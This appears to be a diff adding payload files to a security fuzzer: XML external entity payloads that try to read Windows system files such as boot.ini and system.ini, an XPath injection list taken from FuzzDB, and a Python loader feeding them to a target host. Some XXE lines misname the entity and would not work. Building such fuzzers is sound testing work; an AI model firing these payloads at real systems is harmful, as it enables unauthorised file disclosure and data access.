+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\Windows\system.ini"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\Windows\"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\inetpub\"">]><foo>&xxe;</foo>"
+
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\boot.ini">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\inetpub\wwwroot\index.asp">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\pagefile.sys">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\Windows\system.ini">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\Windows\">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\inetpub\">]><foo>&xee;</foo>
+
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\boot.ini">
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\inetpub\wwwroot\index.asp">
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\pagefile.sys">
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\Windows\system.ini">
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\">
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\Windows\">
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\inetpub\">
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\Windows">
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\inetpub">
--- a/fuzzer/payloads/lists/xml/xpath.txt
+++ b/fuzzer/payloads/lists/xml/xpath.txt
@@ -0,0 +1,15 @@
+# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xpath/xpath-injection.txt)
+
+' or '1'='1
+' or ''='
+x' or 1=1 or 'x'='y
+/
+//
+//*
+*/*
+@*
+count(/child::node())
+x' or name()='username' or 'x'='y
+' and count(/*)=1 and '1'='1
+' and count(/@*)=1 and '1'='1
+' and count(/comment())=1 and '1'='1
--- a/fuzzer/payloads/payloads_loader.py
+++ b/fuzzer/payloads/payloads_loader.py
@@ -0,0 +1,48 @@
+import os
+from fuzz_payloads import FuzzPayloads
+
+
+class PayloadsLoader:
+    def __init__(self, hostname):
+        self.replacements = {"<<target_hostname>>": hostname}
+
+    def load_payloads(self, file_path: str, directory_name: str, keep_newlines: bool = False):
+        if file_path:
+            try:
+                with open(file_path, 'r', encoding="utf8") as custom_payloads_file_pointer:
+                    for line in custom_payloads_file_pointer:
+
+                        # Skip empty lines
+                        if self._is_empty_or_comment(line):
+                            continue
+
+                        line = self._replace_target_hostname(line)
+                        if not keep_newlines:
+                            line = line.rstrip('\n').rstrip('\r\n')
+
+                        FuzzPayloads.add_payload_to_list(line, directory_name)
+
+            # If there is some problem with file, just continue with the rest of payloads
+            except FileNotFoundError or IOError:
+                print("WARNING: Error when opening file: " + file_path)
+
+    def _replace_target_hostname(self, line: str):
+        for pattern, replacement_value in self.replacements.items():
+            line = line.replace(pattern, replacement_value)
+        return line
+
+    @staticmethod
+    def _is_empty_or_comment(line):
+        # Comment is every line which starts (without white spaces) with '#'
+        if len(line.strip()) == 0 or line.startswith("#"):
+            return True
+
+
+def load_default_payloads(hostname: str):
+    loader = PayloadsLoader(hostname)
+    base_path = './fuzzer/payloads/lists/'
+    for root, directories, files in os.walk(base_path):
+        for file in files:
+            if file.endswith('.txt'):
+                directory_name = os.path.basename(os.path.normpath(root))
+                loader.load_payloads(os.path.join(root, file), directory_name)